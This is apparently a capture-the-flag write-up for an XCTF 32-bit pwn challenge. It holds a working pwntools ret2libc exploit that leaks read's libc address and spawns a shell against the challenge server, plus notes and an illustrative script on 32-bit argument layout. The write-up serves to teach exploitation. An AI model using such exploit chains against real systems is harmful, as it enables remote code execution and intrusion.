Learned 64-bit ROP gadgets and then forgot how 32-bit passes arguments???
https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4847&page=1
```python
from pwn import *
from LibcSearcher import *
import time

context.log_level = "debug"
# The target is a 32-bit binary (p32/u32 below), so the arch is i386, not amd64.
context(arch="i386", os="linux")

z = remote('111.198.29.45', 49363)
z.recvuntil("Welcome to XDCTF2015~!\n")

elf = ELF("./pwn")
write_plt = elf.plt['write']
read_got = elf.got['read']
main_addr = 0x80484be

# Stage 1: leak the libc address of read via write(1, read_got, 4), then return to main.
# 32-bit frame: padding, saved ebp, callee, return address, arg1, arg2, arg3.
# read() in the target consumes exactly 0x100 bytes, so fill the payload up to that length.
payload = b'a'*0x6c + p32(0) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4) + b'a'*(0x100-6*4-0x6c)
z.send(payload)
read_addr = u32(z.recv(4))
print(hex(read_addr))

# Resolve libc from the leaked read address and compute system and "/bin/sh".
libc = LibcSearcher('read', read_addr)
libc_addr = read_addr - libc.dump('read')
sys_addr = libc_addr + libc.dump('system')
binsh_addr = libc_addr + libc.dump('str_bin_sh')

# Stage 2: system("/bin/sh") with a dummy return address, again padded to 0x100 bytes.
payload2 = b'a'*0x6c + p32(0) + p32(sys_addr) + p32(0) + p32(binsh_addr) + b'a'*(0x100-4*4-0x6c)
z.send(payload2)
z.interactive()
```
Two things to note. First, read() reads exactly the given number of bytes, no more and no less, and needs no newline; if you type an extra newline it will be counted toward the next read().
(Update: a newline can end read() early, and that newline character itself is read in.)
The other problem is that I mixed it up with 64-bit again. I laid the stack out as write_plt, 1, read_got, 4, main_addr. That is wrong. The stack should be laid out as: call_function, return_function, var_1, var_2, …
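To make the two notes concrete, here is an added example (not code from the write-up) that builds the 32-bit frame and then decodes it the way the CPU consumes it after `leave; ret`, so the mistaken 64-bit-style ordering shows up as write() "returning" to address 1. The write_plt and read_got values are hypothetical placeholders; main_addr, the 0x6c offset and the 0x100 read size are the ones from the write-up.

```python
import struct

# Values from the write-up
MAIN_ADDR = 0x80484be   # address of main, used as the return address after write()
BUF_OFFSET = 0x6c       # distance from the buffer start to the saved ebp
READ_SIZE = 0x100       # the target's read() consumes exactly this many bytes

# Hypothetical placeholders: the real values come from the binary and are not on the page
WRITE_PLT = 0x08048380
READ_GOT = 0x0804a00c


def build_frame_32(callee, return_to, args, total=READ_SIZE):
    """Lay out a 32-bit cdecl call frame after the overflow:
    [padding][saved ebp][callee][return address][arg1 ... argN][filler to total]."""
    words = [0, callee, return_to] + list(args)
    frame = b"a" * BUF_OFFSET + b"".join(struct.pack("<I", w) for w in words)
    if len(frame) > total:
        raise ValueError("frame longer than the bytes read() will consume")
    # First note: read() takes exactly `total` bytes, so pad up to it and send no newline.
    return frame + b"a" * (total - len(frame))


def decode_frame_32(payload, nargs):
    """Read the frame back the way the CPU does after `leave; ret`:
    the word above the saved ebp is popped into eip, the next word is what the
    callee will return to, and the words after that are its arguments."""
    w = struct.unpack_from("<%dI" % (3 + nargs), payload, BUF_OFFSET)
    return {"saved_ebp": w[0], "eip": w[1], "callee_returns_to": w[2],
            "args": list(w[3:])}


if __name__ == "__main__":
    good = build_frame_32(WRITE_PLT, MAIN_ADDR, [1, READ_GOT, 4])
    print(len(good), decode_frame_32(good, 3))
    # Second note: the 64-bit-style order (callee, args..., return) from the write-up.
    bad = build_frame_32(WRITE_PLT, 1, [READ_GOT, 4, MAIN_ADDR])
    print(decode_frame_32(bad, 3))  # write() would return to address 1 and crash
```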